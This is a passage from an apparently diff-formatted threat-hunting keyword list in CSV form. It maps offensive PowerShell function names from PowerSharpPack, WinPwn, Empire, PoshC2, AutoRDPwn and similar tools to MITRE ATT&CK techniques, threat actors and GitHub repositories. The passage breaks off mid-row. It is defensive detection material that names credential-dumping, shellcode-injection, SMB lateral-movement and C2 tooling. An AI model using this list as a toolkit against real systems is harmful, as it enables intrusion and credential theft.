+"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell 
for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpRDP.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-SharpWeb.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Shellcode -Shellcode*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-Shellcode*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z"
+"*Invoke-Shellcode*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 
APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral 
movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SMBExec*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SMBExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smblogin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBNegotiate 
